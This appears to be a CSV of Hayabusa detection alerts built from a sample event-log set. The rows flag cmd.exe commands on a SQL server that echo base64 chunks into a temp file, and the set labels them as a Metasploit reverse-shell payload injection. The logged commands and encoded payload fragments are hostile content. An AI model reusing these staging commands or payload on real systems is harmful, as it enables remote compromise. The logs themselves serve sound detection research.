JIvm/EE7yB4x/HITc4sDAACFvHUii0sEjVU9iwNSjVUfg8MIUo1V0FJqP1FQ6HEMAAArxBjrMYP4AXQNg/hadQgPvwODwwQWBSQDQcObik38jRis+FdN0FJRaldQiUWX6EgMAACDiBSLkYtF5IXAdCezRbSNUOiB+gACAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:16.841 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Bcz/AUgAOUX8cw9OOQbdi038QTvIiY3ncvGLRdCFwJyE/QEAAMpF+w/p1N2UAIXA0x+LUwSLA411/IPDCAGNdbpWUWoDUi8ZoUMAAINaS+sug/gtdBA1+AJ1C4PDBDPAZos2/OsFiwP1w0SNVfxSjVWsUlFqMavoU6AAAIPEFD1Ki0XkhcB0J2JF8I1I00j5AOwAAHIFuP8BgQAWdcpzD07GBu2LTfxBO8aJz/xy8YtF1IXAD4RkAu1ogD4wD4RbAgAATsYGMOlLNwAAhcB1qYtTBLYDjXX8g8MIVhp1UVZRagRSUOg1EAAAg8QY6y6DpAF0EIP4AnULg8MEM8D4i9D86wWLAwa7BI0N/FKNVaxgUWoEUOg5NgBmg8Sxi/D4ReSFoXQNi0XwH0gBgfkAAs1TcgVQ/wEAADnqhXMPTsYGMIsv/EHjyIklA3Lxi0XUhcAPgsYBAACLRdhoDQ+EuwEABItVIE5OilGIRgHGBs2LRZGD3QJYoAHlRYszg8MEhXYPpsgDAAAgReSFwHUYV/6Dyf8zwMZFF6XyrvfRSYlN/Ol3AQAAi7TwM9KUyYvGiVWWD4ajAwAAgDgAD7qaA5kAQEI70YlVmrbuxkUXIOlKAQCM3QOLReTowwjdXbSFwLgGPpsAdEW3RfCNVfxSjdet/f//Uo1k0FKLfLhQi0XUUH9FQJpQUeiiMwAAi5yLRaqDxCCFwHQ8xkX7LengAAAAi0XEhcB0CcZF+yvp0IKT+O5FPIUSD4ThAAwAxkU1INm8AAAAi2LkhYtjQLgGAAACNxZFRfCFwHUIuAEAAACJRfCdTcSNla2Nlf84A1GDwwhSUPbsCN0cJOjgBQA2i/CD7BSAJi11B8ZFeS2q6xiKRSp4wHQGxkX7K+sLi0Ughed0BFAAcSAE/oPJGzbA766LRdT3iEmFwIlN/GIiky7X/xV8EkAAg8QIhcB1EotF/MYEfy6LRfxAokX8xgQwAPTZEGI5R3UTamXt/xV8wUCEg/EIhcCiA8YARYoh+4TAdByB/vrCQABOFNtFBzvwdA0NZ/sjiA6pRfxAiUX8i0XMhcAP3AEDAACDfcCcD4X3AgAAi1Xgi/0YO4cPfukCABOAfRcwD4V+AgC2ikVfhMAPhI6pABicRXuLfQyFwHRoO2fccnZXiQf/VQjCxASbwBTmjAMAAItPBIuaQ9jckxaIEJKJRfSLVeyLTeBC5IlV7ItV/NfkhlX8jkPg0kkCAACKQoPDBIhz6o116sdF/GgAAADLRRcg6f7/9f/GkOoljXXqx+n8AQAAAMZFNSDpS///w4PDBIXAdU2LReyLS/yZiQHHY7wAAAApiVEESNn///8g+EB1aItT/ItF7MdFvAAAg9WJAukT////g/gCdRaLS/xmi1Xsx0W8AAAAAGaJEen4/v+pi0P8i03sx0UGAAAAgsoI6eT+CP+L/K2xiUUQigBQsciD+XQPh2OLAAAzwtKR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:17.115 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo pHyqCv8klYB8QNqLA41N/ElsBI1VrFFSanhqBFDoWgyocxrEd4vwxoEXIOmb/s//iwODw3CFwA+EwADpAMxN/I1VrFFSUOhRCQAAi/CLReQptQyFwA+ErgAAAItF8ItN7jvBD7OgKQAAiUX8xkUXIOlW/v//iwODkMeFwHR/jU0tjThqUVtQ6IAIAADrvYvhg8MEhcB074sQxI2s/f//aP8eAABRUughDQA+oPCDyf+m/jNA5wVy0UnGRRcgiU1l6eX+Nv+LmIPDBIWddC+NTfyN1axgUlDoUJEAAOlqUf//IAN7wwScwHQTjQb8jVWs+VJQ6FTdAPnpTv///76gwkAAx0X8uQAAAMZwFyDphv3//4OWBDxCdQuLQwKFwHSs09+0bzwOdfGLS/yFyWgHd7RcSQTrBPTA9smNVdJSpFC+52f//4vwg8n/i/5HwPKu99FJxkUXIIns/Ols/f9J/kj0QABu7w0IAAAAxkX7AIMC4+lU/f+uxkUjsoj964116n1F5wIAXgDGjnZN6Qrm//+LfWaLRfSFwHTxO0XcchlXiXL/HkJExASQwA+F/gAAAItPBMgHiU1WilUXiBAPiUX0i03si1X8QejS7BBNckkvyp1Ng3fAixn26fgBiyv0dUoGJvyF/5RDhcB0NDvpRXInfUUIi00nUIkIIVUIg8QEhcB0hdUVAACLRQyLEItABIlF3IlV9C0Zig6ICIdLRfSLTTxBRk+JTex1vYtNioXJdFiLTcCFyZhRi1Xgi038O9GVR4XAdB+8RdxyIIt9DItFiVeJB/9VCIPEBIXAdU+LD01XBIlN9IlV3IvBik0uiBJAiUUBiz/zi1X86+FN7LFN4Ek7yolN4He5/0UQ7VUQinCECw+FXPX//4tNDHVF9F+JAYtF7F5bi+VdwhAAX16DyP9bi+VdwhAAkKJ7QAB9eHoAlXZAAE93QACNAUAAYnhABlR0QACUeEAA7+lAuft4QAA9dkAA6HNAANh6QAAAfQwMIAzGDAwMDAwMDAwMDBcMDAwMDAwM8Aw8DHkMDAzNyQwMAYQMuFUM4AwMDAwMDAxRDAyMDAxqkQyhDAwMDCMM/VoCDAMMDAwMDAwMDAwMDD0MDAwMBAwM/QwMDAwMDAwFBmYCSQwGDAwMDAcICQwMCgwLDAy2jUkAontAAIl5QN4mekAARHlAANl5QJGieUAAjHmDAPV5QABzekAAAAgICAiHMwjgCAgIOQgICAgICAgZCAgICAgICAgICAg/wggICAgIHggkCAjj6ggIR+4nCAgICHUICAgICAhjCAgBAggICAIhCOoICAh9CAgICC0CBAgICAgIQlKnCAgICAgICAgICGwICAgICAXwCAYICQh5kJCQkJCQkFWL7IPsWFbORX1XS30QjU38UItFDI1VBlGLTQhSWFB66CMBAACaTYSLORSDxBiJR/iFyYuddAbGAnLmcgFQT/9Ts8l+D4A8>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:17.389 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ATB1Bk+chcl/9Il9EEldDIXbD4znAAAAi8srz4P5BA+PsAAAAIXbfzuAODB0BMYTLquF230u/8u4rzAViffZiU0Mi9GLPR2NAvOri8oe4QNOqot9EBHCi1UU1dgD8ItF+IldDLkBe/oAOyF8EooQiBZGQG3LSe7GnQ5GQTvPOu2LVRQ7un0iK9+ZMDAwMItgiyyL0cEvAmSGi8qD4b8Da5GqSwYwi1UURopG/1s8pw+FlwAAAP06GIXA8l8PhYwA7gBzRv/sX1GL5V3Kg/v9D41Q///uS0aJXQySEIhWDkDGui5Gg/8BfgpPigiIDjJ+T3X3xuplRrjbfb7328YGLXkDxgYrc8O5ZAAAMqP3+UaFwIv6fgUEMIgGRovDuQreAABi9/mFGyfKfs64Z2ZmZvfvwfoCi8LB1h8D0J3CMIgjTIDqMIgO6Rb//9uLwsYGANnQi+VdHZCQVYvsi0Uci00Yi/0UUItFEGoBUYtNDFKLVQhQUVLoDgDupYPEHF3DkJCQkJCQkOIkVYvsg+wUg30QT3wHx0UQXAAAAN1GCNwdMNxAAItNGFOLXfdWM/YMA+CJdfyJMfbEBYv7Yg7dRQjZ4N1dCMcBAQBfACFNDItVCH/j7FBRUiEVGMFAAN1dCN1F7NwdMMIRAIPEDN/g9sREe3KNc1A7PXZYFEXs3B0wwkAAWeD2xERMSFDd7NwNEMNAAI3m7N+D7AjdHCT/FRjBQAC1XfTdRfTcBQjDQACDxAxO3A0Aw0A36No1AADqNp+xMCrIiA6LTfxB5PMtTfx3qI1D9zvw2qyKFogXR0Y78HIG61DdRQjcHXfCUADf4CUZQQAAdcHdx33cDa/CQADdVawXwNwdKPucAIng9sTkeiHdVeMuDfjCQEsL2cDcHSjCQADf4PbEBXum3V30iVz86wLdUotY9Y00GItFHIXAdW0DdfwdTRTF83Pri0UQiPfYiQHGAwCLKV5b+uXuwyEb/GT+iRF3PN1FCI3XUDv4czBPDfjCQACNY/RQg+wIvv8k/xUYwZkA3UVGg4AM6AU1AACLTRSLXcsEMIgHRzv+dsndZyZTUCuncg2YxkNPAIvwXltGxV3DghZ8bYC9bIBOOYgWfs6LVRE7gsYGPMYFTv5s677GBjGLzkeF0on6dQg7w3YDxgA2QGM+MH8zxgBEX4vDXluL5dPDkJCQkJCQkJBjkJCQkJBVi+yLRQyLMUVTVleLfRSrwPL3dDOLRRDHAAAWAADrEov9EDPAhckPnMCFYokCdAL32arNzMzMs41R4cHqA4rCTpjrS8iAwWycDgukhdJ1LYtFGDX+iTiWxl9eW13DkJBVi+yLRQyLVRDGi112V4v0GIXAdw1y9IP7/3cEbcl1IWpnFzR8CIH7////aHcqCfj/fLR/CIH7AACtgHIbhcmOG4ueHF9VFFBXUmRT6ML/He+DxMhfWyLDhcl0C+9NFMcBAJ8m3iwjhcB/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:17.664 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo DXzUJz5zB7kBAAAA65kzs4vNFIUFifR0B/fbg9AA99hWagBqClB26KQ2AO5YyIvyisGyCvbqKncEgMMwi8bcH4vZjj502+BFxYtNHG3HXokBi8dfW13DkN+QsiKQjJDXkJCQkNOQVYvsUYtFCFOHiwhR/xWwwRMAi3UMi9j9VQiNRQxSi8tWUEzh/yEAAGoBUYld/Ojh/v//SI1VCFJQxgAKjUUMM8mbis9qAVHohP7//0iNVQhSUMYAhI1FDDPJUIpNimoBUQSa/hH/SExVCFJQxgAujUUMjhgBwesYU+ge/lX/i00Qg8RQtvCJ8F5bi+W8w5CQVYvsg+xWU1aNRfy5i9apUIupCI1N+DPSV2YkUAxRagFS6Br+/4eZ2ItFCIPEFEsUyJD+///GCsOLSLlgRXjolOr//5LAbzmLHhBLK/uLw8ZqP4k6X15bi+Xzw0T+g8nZzv/yrvfRSSvZi8ET+8HpAoalpguLGgyD4QMrw8iki2UQX16JAYvDW3blXcOQkJCQVTrsnps8i4QIi1UMUYsAVk0IUlFqAVDof/3//yLEFD3DkAtqkJCQIJCQkJCQkJCQVYvsgxNcXCwIUwyLdSBXiyP0PGZ1HItNHI1FpFCLRRCNVRhRDk0MUleCUVjAAQAA63aLRRyNNqRSjU0YUItCbI20C1GLTQxSUFEJAfv/OosVl8FVAIvYg1wHPDoBfhUzwGgDFeEAigNQ/xV4wUAAg8QIhRV6FXjBQAAzG4oLiwJmi2BIJQMBAEaFwPKei/uDyf8zwIpVJPKui0Ugi/P40UmL+IkKQYvRwekC56WLyoPhYPOk2j8cX15bwgEAAAAAi+Vdw4pVo4D+LXVskUUYhcDeQYt1IMYGMEaF/35NjAYuK4XAfRf32EzIiUUci7EiMA4wMIv+wekCGLOlyk3JA/OqFEUYi8qKaC8D8QPBQIlFGOs/SEaJRRiKC+dOakOFwH/xSIX/iewYfwSLiySFyXa4xlsuRgsbi3Xjiq+IBkYShf9/v4tFFIWfdATGBi5Gi0WaXQuEyXQLiA6KSwFGQ4TWdfWA+mZ0aNcfRl6JGRh0U425HI1VgVGNTQhSLWoUW+j6+///iwanocQUi02HhdsPlcJGg/nfjYQSK4i4C3U2xgYwRgXmhcl0QYoQiBZGQAx199FFIItN5CtLX4k8+1sW5YvDxgYrRsYGMHTG4jBGi0Ugi00kK/Bfia1IHFvlXcOQkJCQeJCQkJACkJBqkFXG7ItFHItNyZ5VFFqLRZVqAFGLTQxSi1UIUFFS6G75//+D5hxdw7CQ5ZCQXZCo7FWLI1NWV4B9DL4BAAAAIM+LRRpMvMJAwdPmik2TToACWHQFuyERQACLVQiLzkgjyooMGYiyi3DT6oXSdUeLTRSLVRhSbF9eqgr8XUGQkJCQVcPsi00QU+fJRRR1v78AAACLdRi75MJAANPnTzxYdPC70MJAAItVDItFCKvS>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:17.939 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo /LSvBYP4/x8bi1UcUovQGFKLVRRSUVDo6Av//4N6FF9eW2Hqi8hOI8+KDBmIDktNEOgdMgAAi8gLynXorEUY/FUcK8ZfqAKLxuVbXa6QoJCQkJBVi4KLTRCLRWWLVQzEyQBSaiJqBFDoFv///4PEFClKkFWL8YPsCFaLdQy3KnUIiXX4iXX86w2LRQiJ3/iNREb/iUX8rVUQjZgUUY0LjVRQaNCGQO3oxJyp/4X2dAZ+TfjGAQCD+P91A/l6/16LRF3Dg8j/w5C3eeiQkJCQkJCQhPuLvYtFCD0gURUAfRWLTRCLVUFR71DohQMA9oPEDF3CDAA9wNSMAH0bUOiRWAAAI00MUIus0lC0SWMApwCXxBBdwqzEPdY5CgCYnItVkotFDGhU+RQAUrroQwAAAIPEDF1hDAA9gD0KAH0Zi00QiwUMaFT5QABRUigjAIUAg8QMXcIMAItNDPOAnwL/FYswEFBR5VkCAACDxAxdwgwAkJBVi+yLRQxXTRBWi3UIUFFWkbsdAADsxl4qw5CQkHmQkFVE7It/GD1xEQEAE4/DAAAAD9G2AJ7aBd5V/wN8+AAP5zcBAAD/JA0EiUAAuIQAQQBdQLhgAEEArZa4QABBGV3puLZuQb9dwyPk/0AAXcNhtP9AAF3DuIj/QAClw7is/0AAXRi4IP9AOF3luPD+fgBddua0/kDLXcO4jP5AAF3DuHz+QGNdw1RYB0AAXSe4LP6HN6jDuBA4QABdw6j0bEAKXc241P1AOF3DuKxeQABdw7hs/UDYXcO4PP1A/l3DuBz9QABdw7gM/UAAXcO4wPxAAF3TBY5O/v+D+BZ35/8qhWyJQAC4cPxAAF3DuEj8l6tdEZwg/NgAXcPM8PtAEV3DuLxCQABd2YeXU9HNXcO4YPu5wF3DuDj7rgBdw7gA+0AAXcO47DxAAF3DLLz6QABmF+SQ+kAAXYu4ZPpAAF3DuDT6QABdw7hB+UAAXcO4tPlAAF3D2Jz5QABdw7iV+VMAXcOQzIdAAPyIQLfTh0AA2mZBAHf3QADoh1tR7w5AAPaeEwD9h8+TBIhA3guIQADliEAAYIhA/SKIFNcniEAALohAAIWIyAAgiEAANYiIANeIQAATiEAASohAAJcLzgBYiEAA/Igap1+IqgOFiEAAjIVAAJOIQACaiED0oYhAj6iIQACviEDx/IhAAJ2IjwDniEAAtohAAL1gQADwiEAAy4j2APyIQAD8iEwA/IhAANKIQADZiGUA4IhAADWIQADuiEDQ9YhTqZCQkJCQkJCQMYtksotdDKzMdQhXi33NaqlTVmgABHYACRsAaAASAAD/FZTA8gCFwHX+QQ2Kw0DRhakMWzk8xRjDQAB0DosmxQ3DQIIshcmL6+tEiwTFHMNAAFNQPHYmGwDai/6DyawzifKu9/BJi8Ewq4VwrDGKXjD/uK/5DXQFgPkedQTGBEgga8B16YvG6F5pXfyLfStX>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:18.213 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aKjBQRxTNujd/P//g84Q98ZfXltdw5CQkJCQkOWQkJBVi+yZRUBQ/xXkwUAAg8QEhbd0E4tNEIsdIFBRUuj0////g8QMXWOLRRAuTQxoVPlArzZR6Mf4//+DxAxdw5BRVYvsg+zOi5smVr51EInr+ItNF2oAiwZgAI1V/IlF9GoAUpHXBC5F9L8BUFKxRfwAAAAA/xWYwUAAHOD/tHdXiz3YwU4A/9dWwIQKiQZfXotXXcL+AP/Xxz4AAPoAXwWA/AoAXovlXcIoAIvk/JUGM8Aii+VdrQwAkJCQkJCLkJBVi+yD7BCLTQxWi9kQagCNVfixAEAvUotV7olF8I1F/IlN9FCLQgSNgfBqAVFQcUX81AAAz8dFJQC+AMYdFZTB8wDQ+JR1LFeLPd/BQL//14XAdQqJBl9ei4cI7QwA/ynHBgAgAABfBdfoCsdei+VdwgwAi0X8iQZe99gb0CVH7v7/BX4RAQCL5V1MWgCQkI9ViyRRiw8IjW4KUMR+ZgSAUQFF/B8AAEb/FbTBQHn0+P91HlaLNdjBQADX1oXAqgVei+Vdw/+889/8CgBeQOVUZzMb0OVdjZCQkJCOTJBVh1WL7FGLTQiN9ppQMH5mBDhRx0X8AQDvAP8VtMEqAIP4/28e54s12MFAAGaRhcB1c16L5V3D/9ZpgPwKAF7QK13DM8CLUCbDkJCQwJAGBZBdVaLsU4tdDFaLdQhXi30Oi8MLx3Upi06Di0YkC8gP3goBRwCLVgRS6NT///+DxASFzA9J9gAAAGLHrF3CDACFPA+MmwAAAH8ItJgPhqwAZgCwRiD+TiQLwXUUuE4EUej9/v//g8QEH8AG1ccAAACLViDO03X18EYkO9APhNqwAACLTRBqAGiLAwAAdVMwsBhPjCgAAItWBIsduMGcQEMEq2gGEIGCLP//0wAb5AsL04tG8WoEV18FEAAAaP//ABZQ/3OLfRCLXQyJlySJXiDFXjPAW13CiaiF/n9STwRu23MqYU4Ex0UI6QBwAFHob5//S4PEBIU9dT18Rh2LPdTBQADu1Qhq9QpoBhAAAGg4fgBDUP/XcFYEI00dagRRPXHK9gBo//9G5FL/14t9EAteIIl+ITMRX15bXcKUJ5CQkJBVi91Ri0UQM8lDwA+VwYlN/ItNDIP5QNVmXTVtAAAPhKgCYfBJg/kPzg4AAwAEcdIZkaKRQQD/JJX41kDWiy2tMgI/TvEP4QKA+XwPM8I7wnQvi04EjYn8apW7am3X//8ALlH/FezBQJCg+NAPikMCrgCLRRCFwCpGOIcODAKJKzgzwF7/5V3CDAAk/YlGM7XAXrHlo8IMW+4hCTPJi1Y4g3IEgPoED80BWK101IsZBDtV/L/ZUmoBaP//AABQ/xW4wUBNg/jCD4ToAZUXi0UQYsCLRjg2DgwEJJA4M8Bei0Jdwgw+JPv0RjgzwF6L5V3CDLSLrwgz0otOOIPhEJ95EA+U>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:18.488 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wjvCD4R1////CU6hgEX8asZQagRo/0EAFVH/ALjBQACD+P/768oBAACLRRAlwItGOCcODBAURt8zwF6L5V02mwAk74lGODPAXovlXcK0AIt1CPLJOkI4TOJ0gPoID1bBzchzhBb/sf+FwHQXiwhBUujS/P//g8QEhcB0G16L5V15DIuLRgRQ6JH8//+DxASFBNiFpQEAAItFEIWqi6quw+eTCIlGODPAXovlXQMM3iVOiUY4M8BeyOVdwgwAi3Vci044g98BFMmwfxvJQTtp0ISp/v//jVWbagRmiXcItkYEUmiAAAAAaP/gAAB+ZsdFCh4A/xW4DkAAg/j3D4SQAAAAi0UQhcCLRjh0DgwYiUY4M55ei+UWXgwAJP6JRjgzwF4l5V3CDACLVUyNTRBqBFGL9gRFARAAAGj//60AUP8VuMFAAIP4/w+CMP6+/+tigfkAQAAAf49qSwAADxjvAAAAgfknSAAAD4SNAADEgfkAAgAABoWxAAAAi46/M9KETjiB4QACAACx+dACAOaXlMI70A+E5f2q/4tOBI1FEGoEUGqFagZR/xW4wUAAg/j/dSGL59jBQAD/1oUadQdeZeVdwhvk/9YFxhgKAF6LB11CmwCLQBCFwBFEOHQPqswCiUY4M8Bei+VdwgwAqeT9iWI4Mwpei+VdwgwAi0UIXlVtapZSi0gEaAIQAEFt//8IwQf/orjBQACD+P8P/V39/7Try4H5AIAAAOAMuBbrAABei+9dwgwAfZxoLSBeiwJdwgwAi/9wj0AA7Y1AAEiOQAACjxgAo479Z96QQAAAAQUCBQUFAwXABQUFBQUEsovs2uwEX9EQi00MVldQjVUiUVLotdn/l4tFPItNCEG+CgCNAIoUhdjEAACNBBTYxEAAiFH/QEGKEIhR/4oXAYtV6IjYQY0ElbTEQADGAUtBABCIEYpQAUFAIRGKQAFBiAGLReSZ9/4dxgEgQQQwdMIwiAGLReBB3Y9Bmff+xgF8QQROjMIwiAGLZ9z5iBEqYcz+CgE6QQQwgMINiAGLRdhBiBFBmfdztQE6QQQwgMKRiAFBiBFBi1Xsv+gDAADGASBBqG9xmwAA/8aZ9//CZAAAxgQwiAG4H4U8UffXwfoFi8JBwegfA9CL9YDCMIgRQZmZ/7hnZuVm7ffqHIkCi+TBpR880IvGgMIwvgoADwCIEUGZ9/5egMIwBsCIEcZBAQCL5V3CDACGlpCQCZCQkFWL7FOLXRBWfIv78XU0M8CLdQjyrvd/gfn4AAAAiU1cjmuKU6SA+jp1oopDAhMvdAQ8XHUaaODsQQBW/3gQwlIAvEUMg8QIg+gEg8bR6zuKAzwvdAQ8XMA0gFYvdAUQ+lx1ioB7Ajp0JIPpAmjMAEEAVoPDAolNEP8VEAJA3FhFDIPECLWECIPGEIlFDI1FDI1NM1BWUVOstBYAAIXAdBs9eIlBAHXDX164FgC5AFtdw4tFEIXA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:18.764 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dAruXrgmAAAAW13DZov6Z4XAdPdmPS8AdQWZxwZcgWaLeQL+xgJm/cB16TPAX/4hXfCQkJBzkJCQkFWL7FaLVwhXwP9RzAT/EISEAAUAikbChMD7CFbobx/eAIv4i0YYJQDTBAZ0Wj0AAAAGdRdqE/8VCMFA6oPEBGr/efSpFaTAQADrRowAAABedRdqAf8VCMFaAFeMBE3/1fX/FaRjQADrKD0AAHsCdaNqAP8VCMFAAIPEBGr/avb/FaTA+QDrVotGBFD/FXTdQEjBRgT/////i0YMhcB0FYtAEIXAdJ5Q/xV0wEAA80YQAAAAAIvHX15dw5CQMfYTkOug7LhBQAAN6M8kAABTi10QzVcz/8dFUI0AAAD2wwGJffx0B8dF/AAAAIB3wwJ0B4FND6IAAED3FwQAAAh0CcSbUYDMAYlF/FAN3L/9AIO5Hj0Ix0X4BwC/AIvDg+AEdmtww0B0B9EBAAAA6yKKbIDiPfbaG9KD4v6HwgTrD4rTgD4Q9tob0oPiAoPCA4vy9sNAdBKFwHVzX164DQAAAFuL5V3CMwD2xwF0Bb8AkhYE98MAIyAAdFmBzwAAIAD2ygP8gvfDDQAQAA5Pg/kerQaBzwD0AAL3wwAAQAB0ByZN/AAAAgD2VQJ0BoHPCgAAQIP5U3wH9sc+dAmAzyiBzwAAAEiLRUgkjfi///9laAAgAABR6FK9//+DxAzhwA+FkVMAt8hV+FBXVlCLo1M8jXr4Qf//UFH/FbDZQADrG4tV+ItV/ItNDGoAV1ZqAFK4Uf8VrMBAAIDnmsD4/4lFlXUgmDVtwEAA/9aFwA+ErAGzAP/Wb14FgPwKAFtPqPrCtACLVRjOYFLo1LT//4t1CIv4M4qLF7kYqQAA86tVfRiLTRCJFk46i1UMiwZSVyLNBOibwv//i5SJQSCLGYPI/4laGIsO38MIiUEQiUEUixaJQjB0G4sGagJqAGoAx0A0AQAAAOcOi1EdUv8VqMBAAITbeR8gBmgAEAAAV8ZGLAHoXLRo/4sOiUE4TBbHQkAAEACBiwaKSCyEyXUHi3mCCMl0PFeDwFiwAFDosgsAAIXAj0UMdCmLBlDo+v26RoPEBIW4dQ6LDmi1k6gA0FfoTr8UPItFDF/kW2LlXcIUAIM93AhBADLIFov2i0iwhO1RDbITSgAAAIPEk4XAdAuLwItIGIDlBIlICe0WcABXvcJcavpm6Hih///Kx/RvFYs2aCByQABoQIRAAFaLBlDoTmH//zPAX15bLuVdwhQA3pCQVXLsgwZqVot1CI1FyMdF/AAALACLjwRQUf8VvMCMAIXTdA+LRcj2xAJ0BzPAXovlXcOLRgyFwHQRAUAIAAAAAItWi8dCDAA4AAB/RgyLVgRXjU36UFFqGWoAzwBqAGjEAAkAUv8VTsBAAIXAZpVfM8CIi+Vdw4s9mMCujM3Xg8B1Bl/vi4Fdw//XBYD8CgA9ZTsLAA+FsgAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:19.038 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ADA9nMBAAItOFItGEIXJfBZ/BIXAdhBlAG3oXQAAUVDoBx4AAOsHnjGD+P91BAvAk7gz9CGLRgyLSNFR/2NZgAAAAHSAhcB0MaHsfUEAi97NhcB1/1Bo7ABBANMOhocAAIPEDKPsBUEAhcB0BVcp0OsINQH/FUzAQACLRkmL4aKNVfxqJFJQUf9TtMAg+oXAdAhfM32Si+VdMos1mMBAAP/WhcB10l9eM+VdiGvWBb31CgBfXrXlXcOQrZCQkJCQkJAnTZCQkFWL+W/kdQhWNxP7//8IxAQMwHUdiwZoQJNAAEpQ6P69//9nVFhr9nQGs+hRCyoAI8Be5MIEAJCQkJCQkM6QkJBVi+xTVot1EFeLfXUz24tNCI1F1FC3EIlKEOjRFQAAi00QA7Er8YXZhcBUBD79d96LUBSFyXQCOhlfXltdwisAVfrsTOw8oRUIQQBTM9LIE/gRV4lV+IlV9IkZ9H0Xi0UQEvAIUFEgEgYAAIPECB9eKIvlm9GLD6z3wWIAcwAPWywCAACL8TPbgeYAABFRiV38iDbsdArHRfzeAACIQ138i/mB5wAAIhp0s4PLAoldhoHhAABwfIlN6HQGg8sEiV38i0UUg4UCD4XhAH8Ai1UMagRo4AAJAGoy/QAVBMFAAIPEDIXAdS2LRQy7BABwWFODwG0ugAH8AFD/FQTNhUODxMPewHX3/k1LFrYAAAAXx0EMXABiTAZBAIVXdRl0aGgBQQBqAei2gwAAg/5NXEwGLACFwHQSi03ojVXs99lSjVXwG8nRACPK7ez4999RjU1Dlf8j+YtN/AHeGyRXI/KLfQxWUY0MWmoByf/Q6wpqAf9/TKdAADPACvsGIwmLVQwLlBsMQwAzyTvBD4WtAAAAi30IiwvsaCD9z